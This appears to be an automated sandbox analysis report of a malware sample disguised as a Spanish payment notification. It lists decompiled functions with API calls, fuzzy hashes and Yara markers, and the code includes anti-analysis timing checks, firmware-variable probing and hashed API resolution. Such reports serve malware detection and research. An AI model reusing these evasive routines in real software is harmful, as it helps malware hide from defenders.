                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: d0aa205fe1e6e38b4b593f6b9e9ae15254f2181d8a8a5a87d44e3115b8728c33
                                              • Instruction ID: f6c937829e13b5049e456a8d4d14756eb2b923895600d005f137528e52e289f4
                                              • Opcode Fuzzy Hash: d0aa205fe1e6e38b4b593f6b9e9ae15254f2181d8a8a5a87d44e3115b8728c33
                                              • Instruction Fuzzy Hash: 6BE086711442106ED720DBA4CC85ED77B54DF49234F108159F59D97283C531E501C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A440(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d6f
				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                              0x0041a443
                                              0x0041a446
                                              0x0041a44f
                                              0x0041a457
                                              0x0041a465
                                              0x0041a469

                                              APIs
                                              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                              • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
                                              • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                              • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00408EC0 Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E00408EC0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407210(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407420( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BF30( &_v284, 0x104);
						E0041C5A0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00415A30(E004159D0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407450( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004074D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                              0x00408ecb
                                              0x00408ed3
                                              0x00408ed5
                                              0x00408eda
                                              0x00408edf
                                              0x00408ef2
                                              0x00408ef7
                                              0x00408f00
                                              0x00408f0c
                                              0x00408f1f
                                              0x00408f24
                                              0x00408f27
                                              0x00408f30
                                              0x00408f42
                                              0x00408f47
                                              0x00408f4c
                                              0x00000000
                                              0x00000000
                                              0x00408f4e
                                              0x00408f52
                                              0x00000000
                                              0x00000000
                                              0x00408f54
                                              0x00000000
                                              0x00408f52
                                              0x00408f56
                                              0x00408f59
                                              0x00408f5f
                                              0x00408f61
                                              0x00408f6c
                                              0x00408f71
                                              0x00408f74
                                              0x00408f81
                                              0x00408f8c
                                              0x00408f8e
                                              0x00408f94
                                              0x00408f98
                                              0x00408f9b
                                              0x00408f9b
                                              0x00408fa2
                                              0x00408fa5
                                              0x00408faa
                                              0x00408fb7
                                              0x00408ee6
                                              0x00408ee6
                                              0x00408ee6

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93f760812399f8b802e89b1baefd5a0ad2d7afa31538cab3fdcf1f6430cb223a
                                              • Instruction ID: e1e303cda2bc467be42d69ec047be5a8586c693d5030c6259e94ade7c470e7be
                                              • Opcode Fuzzy Hash: 93f760812399f8b802e89b1baefd5a0ad2d7afa31538cab3fdcf1f6430cb223a
                                              • Instruction Fuzzy Hash: 45213CB2C4020957CB20D6709D41AFB73ACAF54314F44057FF989A3181FA38BB4587A6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 41a5e0-41a611 call 41af60 RtlAllocateHeap
                                              C-Code - Quality: 100%
                                              			E0041A5E0(intOrPtr _a4, char _a8, long _a12, char _a16) {
				void* _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t4 =  &_a16; // 0x4158ef
				_t6 =  &_a8; // 0x415176
				_t10 = RtlAllocateHeap( *_t6, _a12,  *_t4); // executed
				return _t10;
			}




                                              0x0041a5f7
                                              0x0041a5fc
                                              0x0041a602
                                              0x0041a60d
                                              0x0041a611

                                              APIs
                                              • RtlAllocateHeap.NTDLL(vQA,?,XA,004158EF,?,00415176,?,?,?,?,?,00000000,00409103,?), ref: 0041A60D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: vQA$XA
                                              • API String ID: 1279760036-3554124191
                                              • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                              • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
                                              • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                              • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A68D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 41a68d-41a68e 4 41a690-41a6e8 call 41af60 3->4 5 41a676-41a679 3->5 6 41a67f-41a68c ExitProcess 5->6 7 41a67a call 41af60 5->7 7->6
                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: D
                                              • API String ID: 621844428-3280389146
                                              • Opcode ID: 7613453768b7ac307976621bb5cae52e22cdf9210156ea2a5dd2e73b6e5c7737
                                              • Instruction ID: c13b4d87617a13f4f93b0b90eaa05018458c5a30578293c5e8b0d20933897835
                                              • Opcode Fuzzy Hash: 7613453768b7ac307976621bb5cae52e22cdf9210156ea2a5dd2e73b6e5c7737
                                              • Instruction Fuzzy Hash: FB0110B2201208BBCB14DF99CC80EEB37ADEF8C754F158249BA0DA7241C634E951CBE4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00407210 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 221 407210-407219 222 407220-40724c call 41be60 221->222 223 40721b-40721f 221->223 226 4072a8-4072ad 222->226 227 40724e 222->227 228 407250-407269 call 419e70 227->228 231 40726b-40729a GetFirmwareEnvironmentVariableExW call 41be60 228->231 232 4072ae-4072b0 228->232 236 40729f-4072a6 231->236 234 4072b2-4072d3 call 41a570 232->234 235 4072d4-4072e7 232->235 236->226 236->228
                                              C-Code - Quality: 100%
                                              			E00407210(intOrPtr* _a4, char _a8) {
				intOrPtr _t12;
				intOrPtr _t15;
				intOrPtr _t24;
				intOrPtr* _t36;
				void* _t37;
				void* _t38;
				void* _t39;

				_t36 = _a8;
				if(_t36 != 0) {
					_t32 = _a4;
					 *_t36 = 0;
					_a8 = 0x10000;
					_t12 = E0041BE60(__eflags, _a4, 0, 0x10000, 0x1000, 4); // executed
					_t38 = _t37 + 0x14;
					 *_t36 = _t12;
					__eflags = _t12;
					if(_t12 == 0) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						while(1) {
							_t15 = E00419E70(_t32, 5,  *_t36, _a8, 0); // executed
							_t39 = _t38 + 0x14;
							__eflags = _t15 - 0xc0000004;
							if(__eflags != 0) {
								break;
							}
							E0041A570(_t32,  *_t32, _t36,  &_a8, 0x8000); // executed
							_t23 = _a8 + 0x10000;
							 *_t36 = 0;
							_a8 = _a8 + 0x10000;
							_t24 = E0041BE60(__eflags, _t32, 0, _t23, 0x1000, 4); // executed
							_t38 = _t39 + 0x28;
							 *_t36 = _t24;
							__eflags = _t24;
							if(_t24 != 0) {
								continue;
							} else {
								goto L6;
							}
							goto L10;
						}
						__eflags = _t15;
						if(_t15 >= 0) {
							 *((intOrPtr*)(_t36 + 0xc)) =  *_t36;
							 *((intOrPtr*)(_t36 + 4)) = _a8;
							return 1;
						} else {
							E0041A570(_t32,  *_t32, _t36,  &_a8, 0x8000);
							 *_t36 = 0;
							__eflags = 0;
							return 0;
						}
					}
				} else {
					return 0;
				}
				L10:
			}










                                              0x00407214
                                              0x00407219
                                              0x00407221
                                              0x00407233
                                              0x00407239
                                              0x00407240
                                              0x00407245
                                              0x00407248
                                              0x0040724a
                                              0x0040724c
                                              0x004072a8
                                              0x004072a9
                                              0x004072ad
                                              0x00407250
                                              0x00407250
                                              0x0040725c
                                              0x00407261
                                              0x00407264
                                              0x00407269
                                              0x00000000
                                              0x00000000
                                              0x00407279
                                              0x00407283
                                              0x00407291
                                              0x00407297
                                              0x0040729a
                                              0x0040729f
                                              0x004072a2
                                              0x004072a4
                                              0x004072a6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004072a6
                                              0x004072ae
                                              0x004072b0
                                              0x004072d9
                                              0x004072dd
                                              0x004072e7
                                              0x004072b2
                                              0x004072c0
                                              0x004072c9
                                              0x004072cf
                                              0x004072d3
                                              0x004072d3
                                              0x004072b0
                                              0x0040721b
                                              0x0040721f
                                              0x0040721f
                                              0x00000000

                                              APIs
                                              • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 00407279
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentFirmwareVariable
                                              • String ID:
                                              • API String ID: 3150624800-0
                                              • Opcode ID: 5ccf3f00ec098825080b94674e8a3308fed8b3daa79723cc6818f48d9d3a4c5f
                                              • Instruction ID: 00cc650ed549834505167bb6027c739d854f51e83e0ea0fc04ccb6602eadb339
                                              • Opcode Fuzzy Hash: 5ccf3f00ec098825080b94674e8a3308fed8b3daa79723cc6818f48d9d3a4c5f
                                              • Instruction Fuzzy Hash: 652177B16402057BE7209E59DC41FEBB7E8DF54764F10842FFA48DB280E6B4E8808B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00407678 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 239 407678-4076ca call 41bf80 call 41cb60 call 40a130 call 415a90 249 4076cc-4076de PostThreadMessageW 239->249 250 4076fe-407702 239->250 251 4076e0-4076fa call 409890 249->251 252 4076fd 249->252 251->252 252->250
                                              C-Code - Quality: 54%
                                              			E00407678(signed int* __ebx, signed int __edx, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				int _t13;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				signed int _t38;

				_t38 = __edx ^  *__ebx;
				asm("lahf");
				asm("bound ecx, [edi]");
				0x83ec();
				_t31 = _t33;
				_v68 = 0;
				E0041BF80( &_v67, 0, 0x3f);
				E0041CB60( &_v68, 3);
				_t12 = E0040A130(_t38, _a4 + 0x20,  &_v68); // executed
				_t13 = E00415A90(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t28 = _t13;
				if(_t28 != 0) {
					_t23 = _a8;
					_t13 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t28(_t23, 0x8003, _t31 + (E00409890(_t40, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
				}
				return _t13;
			}












                                              0x00407678
                                              0x0040767a
                                              0x0040767b
                                              0x0040767d
                                              0x00407681
                                              0x0040768f
                                              0x00407693
                                              0x0040769e
                                              0x004076ae
                                              0x004076be
                                              0x004076c3
                                              0x004076ca
                                              0x004076cd
                                              0x004076da
                                              0x004076dc
                                              0x004076de
                                              0x004076fb
                                              0x004076fb
                                              0x004076fd
                                              0x00407702

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 5aa7d073f3c587e8bf42bb081adeff8b2f81256bb6e77e52e745b70438f6f902
                                              • Instruction ID: 00a19d155c021270983a72ba6c3b10a1e63ec7817bac0b065e05c0601cd06ff0
                                              • Opcode Fuzzy Hash: 5aa7d073f3c587e8bf42bb081adeff8b2f81256bb6e77e52e745b70438f6f902
                                              • Instruction Fuzzy Hash: DD01F931A801297AE720A695DC82FFE776C9F45B54F14011EFB04FA1C0DBA9390687E9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00407680 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 255 407680-40768f 256 407698-4076ca call 41cb60 call 40a130 call 415a90 255->256 257 407693 call 41bf80 255->257 264 4076cc-4076de PostThreadMessageW 256->264 265 4076fe-407702 256->265 257->256 266 4076e0-4076fa call 409890 264->266 267 4076fd 264->267 266->267 267->265
                                              C-Code - Quality: 82%
                                              			E00407680(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_v68 = 0;
				E0041BF80( &_v67, 0, 0x3f);
				E0041CB60( &_v68, 3);
				_t12 = E0040A130(_t30, _a4 + 0x20,  &_v68); // executed
				_t13 = E00415A90(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409890(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                              0x0040768f
                                              0x00407693
                                              0x0040769e
                                              0x004076ae
                                              0x004076be
                                              0x004076c3
                                              0x004076ca
                                              0x004076cd
                                              0x004076da
                                              0x004076dc
                                              0x004076de
                                              0x004076fb
                                              0x004076fb
                                              0x00000000
                                              0x004076fd
                                              0x00407702

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: b252e7fb5a3fa841a4463d49c9e96754b684922344a3da95cd15ab6fad1711e5
                                              • Instruction ID: 278e8058fb31caf7c2e07854df6c2d6cb8d26bb135801241625d4459e23f34b3
                                              • Opcode Fuzzy Hash: b252e7fb5a3fa841a4463d49c9e96754b684922344a3da95cd15ab6fad1711e5
                                              • Instruction Fuzzy Hash: 6401D431A8022876E720A6959C43FFE776C9B04B54F04012AFB04BA1C1EAA8790646EE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A612 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 41a612-41a637 call 41af60 299 41a63c-41a651 RtlFreeHeap 297->299
                                              C-Code - Quality: 58%
                                              			E0041A612(void* __ecx, signed int __edx, void* __edi, void* __fp0, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				signed int _v117;
				void* _v547973437;
				char _t13;

				asm("int 0x3d");
				asm("popfd");
				_pop(_t27);
				_v117 = _v117 | __edx;
				_t10 = _a8;
				_t6 = _t10 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a8 + 0x14)), _t10, _t6,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x35);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}






                                              0x0041a612
                                              0x0041a61a
                                              0x0041a61c
                                              0x0041a61f
                                              0x0041a623
                                              0x0041a62f
                                              0x0041a637
                                              0x0041a64d
                                              0x0041a651

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 2bbf3c62f1547936538f36e0aa77885b688e3179a141a25cd565361584540e7e
                                              • Instruction ID: bc00f8ccd7146db0347601e3343c91c77eea136d8c23055f5eab7594c92902d4
                                              • Opcode Fuzzy Hash: 2bbf3c62f1547936538f36e0aa77885b688e3179a141a25cd565361584540e7e
                                              • Instruction Fuzzy Hash: 3EF065B5600104AFDB14DF55DC46EEB37B8EF84354F108159F90EA7251C530E911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                              0x0041a62f
                                              0x0041a637
                                              0x0041a64d
                                              0x0041a651

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                              • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
                                              • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                              • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                              0x0041a79a
                                              0x0041a7b0
                                              0x0041a7b4

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                              • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
                                              • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                              • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                              • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
                                              • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                              • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00417FEB Relevance: .0, Instructions: 19COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 47%
                                              			E00417FEB(void* __eax, void* __ebx) {
				void* _t1;
				void* _t2;
				void* _t9;

				_t2 = __ebx;
				_t1 = __eax;
				asm("sbb eax, 0x5a4e632c");
				asm("ror byte [edi+0x4311edd0], 1");
				do {
					_t2 = _t2 + 1;
					_t9 = _t2;
				} while (_t9 > 0);
				asm("sbb ebp, [eax+0x31]");
				asm("rcr byte [edi+0x3caf9221], cl");
				_push(ss);
				if(_t9 <= 0) {
				}
				return _t1;
			}






                                              0x00417feb
                                              0x00417feb
                                              0x00417feb
                                              0x00417ff0
                                              0x00417ff5
                                              0x00417ff5
                                              0x00417ff5
                                              0x00417ff5
                                              0x00417ff8
                                              0x00417ffb
                                              0x00418001
                                              0x00418002
                                              0x00418002
                                              0x00418013

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 713b9d538384fd9259be42851c451dd692237f0e1456fddfacb3674368d90f5c
                                              • Instruction ID: 24a62b28896cdfa74019ef1de05a093a588fa2668af02c325f38885156889fc3
                                              • Opcode Fuzzy Hash: 713b9d538384fd9259be42851c451dd692237f0e1456fddfacb3674368d90f5c
                                              • Instruction Fuzzy Hash: 91D0A713649789025750B8AD7C408E4FB50F5871A1FD427A6C91457107DE47B475425D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004172F6 Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dca4749500cbe73d6381d9693766356c3ebfc84f3a8c130e7e7856c49b2b08f
                                              • Instruction ID: 76a54868d3ea3ce24db0a495959cadd894435872b1ebd15e8658e0df6d4a9716
                                              • Opcode Fuzzy Hash: 4dca4749500cbe73d6381d9693766356c3ebfc84f3a8c130e7e7856c49b2b08f
                                              • Instruction Fuzzy Hash: 9FC01223A4B35685C12A8964BD441F8FBA0D54352DB5456DFCC94E34168252D012438A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004072F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E004072F0(void* __edi, intOrPtr _a4, struct HMENU__* _a8) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				void* __esi;
				intOrPtr _t31;
				unsigned int _t36;
				unsigned int _t52;
				struct HMENU__* _t55;

				_t55 = _a8;
				_v24 = 0x53005b;
				_v20 = 0x730079;
				_v16 = 0x650074;
				_v12 = 0x5d006d;
				_v8 = 0;
				GetMenuState(_t55, 0x22c, ??);
				_t31 = _a4;
				_t55->i = 0x22c;
				 *((intOrPtr*)(_t55 + 4)) = 0;
				 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t31 + 0x44));
				 *((intOrPtr*)(_t55 + 0xc)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) =  *((intOrPtr*)(_t31 + 4));
				 *((intOrPtr*)(_t55 + 0x18)) =  *((intOrPtr*)(_t31 + 0x48));
				 *((intOrPtr*)(_t55 + 0x1c)) =  *((intOrPtr*)(_t31 + 0x40));
